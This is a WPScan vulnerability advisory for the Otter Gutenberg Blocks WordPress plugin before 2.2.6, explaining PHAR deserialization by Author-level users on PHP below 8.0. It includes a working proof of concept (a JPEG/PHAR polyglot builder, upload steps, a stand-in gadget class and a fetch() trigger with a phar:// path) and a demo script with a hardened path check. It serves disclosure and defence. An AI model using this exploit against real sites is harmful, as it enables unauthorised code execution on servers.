
wpvulndb | Alex Sanford | WPVDB-ID: 93ACB4EE-1053-48E1-8B69-C09DC3B2F302
History: May 02, 2023 - 12:00 a.m.

Otter - Gutenberg Blocks < 2.2.6 - Author+ PHAR Deserialization

2023-05-02 00:00:00
Alex Sanford
wpscan.com
otter gutenberg blocks
phar deserialization
user-controlled file paths
php vulnerability
wordpress
server security
author user
file operations

EPSS: 0.001 (Low), percentile 45.5%

The plugin passes some user-controlled file paths to filesystem functions without sanitising them. Because PHP's phar:// stream wrapper unserializes the archive metadata as soon as it parses the manifest, any file operation on an attacker-chosen path (even a simple existence check) becomes a PHP object deserialization sink. On PHP < 8.0 a user with the Author role or above, who can upload a crafted PHAR disguised as an image through the media library, can therefore reach unserialize() with attacker-controlled data; turning that into code execution or file writes additionally requires a gadget chain in a class loaded by the site (WordPress core, plugins or bundled libraries). PHP 8.0 stopped unserializing PHAR metadata automatically, which is why the proof of concept requires an older version.

PoC

Please note that the following proof-of-concept requires WordPress to be running a PHP version prior to 8.0 (from 8.0 on, PHP no longer unserializes PHAR metadata when the archive is opened).

1. Create a PHAR file with the following PHP code saved as create_phar.php, run with the command php --define phar.readonly=0 create_phar.php (phar.readonly must be disabled for PHP to write archives):

    <?php
    // The class only has to exist here so that an instance can be serialized into the archive metadata
    class Evil {}

    $phar = new Phar('poc.phar.jpg');
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    // JPEG magic bytes first so the upload passes image checks; a PHAR stub must end with __HALT_COMPILER();
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();

2. As an Author user, upload the poc.phar.jpg file through the media library. Note its path on the server (e.g. /wp-content/uploads/2023/04/poc.phar_.jpg; WordPress appends an underscore to the intermediate .phar extension when it sanitises the file name).

3. Create a simulated gadget on the server by adding the following class somewhere that is loaded on every request (for example wp-config.php). In a real attack this would be a class from an installed plugin or library whose magic method does something useful for the attacker:

    class Evil {
        function __wakeup() {
            die('Arbitrary deserialization');
        }
    }

4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):

    fetch("/wp-json/otter/v1/dynamic?type=author&uid=1234&context=somecontext&fallback=phar://wp-content/uploads/2023/04/poc.phar.jpg/test.txt")

On PHP < 8.0 the metadata is unserialized while the archive manifest is parsed, so the entry named after the archive path (test.txt) does not need to exist: Evil::__wakeup() runs and the request dies with the 'Arbitrary deserialization' message.
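As an added example (not the plugin's or WPScan's code), the script below reproduces the trigger locally and puts the vulnerable file operation beside the check that would have blocked it: it builds the same JPEG/PHAR polyglot, simulates the uploaded copy, calls file_exists() on a phar:// path so that the manifest parse fires the gadget, and then runs the same input through a path check that refuses stream-wrapper schemes and confines the resolved path to the uploads directory. The function names, the temporary working directory and the choice of file_exists() as the sink are assumptions; the advisory does not say which file operation the plugin performs.

```php
<?php
// Added example (not the plugin's or WPScan's code): builds the PHAR, simulates the
// uploaded copy, triggers the manifest parse through file_exists(), and shows the
// path check that would have blocked it. Function names are hypothetical.
// Run on PHP < 8.0 with:  php -d phar.readonly=0 phar_demo.php

class Evil {
    // Stand-in for a real gadget: on PHP < 8.0 this runs as soon as the phar
    // manifest is parsed, which happens for any phar:// file operation.
    public function __wakeup() {
        echo "[!] Evil::__wakeup() ran: archive metadata was unserialized\n";
    }
}

// Build the polyglot: JPEG magic bytes at the start of the stub so image sniffing
// passes, __HALT_COMPILER() because every phar stub must end with it.
function build_phar(string $path): void {
    @unlink($path);
    $phar = new Phar($path);
    $phar->startBuffering();
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();
}

// Vulnerable pattern (hypothetical): a user-supplied fallback path reaches a
// filesystem function unchanged, so the phar:// wrapper is honoured.
function vulnerable_fallback(string $fallback): bool {
    return file_exists($fallback);
}

// Hardened pattern: refuse any stream-wrapper scheme up front, then resolve the
// path and require it to stay inside the uploads directory.
function safe_fallback(string $fallback, string $uploads_dir): ?string {
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $fallback)) {
        return null;            // phar://, data://, php://, ftp://, ... never reach the filesystem
    }
    $base = realpath($uploads_dir);
    $real = realpath($uploads_dir . '/' . ltrim($fallback, '/'));
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;            // missing file, or escaped the directory via ../
    }
    return $real;
}

$work = sys_get_temp_dir() . '/phar_demo';   // assumed working directory
@mkdir($work);
$built = $work . '/poc.phar.jpg';
$uploaded = $work . '/poc.phar_.jpg';         // the name WordPress would give the upload

build_phar($built);
// The archive just written stays cached in this process, so trigger against a copy:
// that forces a fresh parse from disk, exactly like the uploaded file on the server.
copy($built, $uploaded);

// The entry after the archive path does not need to exist; the manifest is parsed first.
$attacker_input = 'phar://' . $uploaded . '/test.txt';

// On PHP < 8.0 Evil::__wakeup() prints its line before this call returns.
$hit = vulnerable_fallback($attacker_input);
echo "vulnerable: file_exists() returned " . var_export($hit, true) . "\n";

// The same input is rejected by the scheme check before any wrapper is consulted;
// a plain file name inside the directory still resolves normally.
echo "hardened (phar input): " . var_export(safe_fallback($attacker_input, $work), true) . "\n";
echo "hardened (plain name): " . var_export(safe_fallback('poc.phar_.jpg', $work), true) . "\n";
```

The scheme check is the part that actually closes this bug class: realpath() alone does not help, because the phar:// wrapper is consulted (and the metadata unserialized) before any path normalisation can reject the result. On PHP 8.0 and later the same script builds and copies the archive but __wakeup() stays silent, which matches the version condition stated in the advisory.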

CPE Name | Operator | Version
otter-blocks | lt | 2.2.6

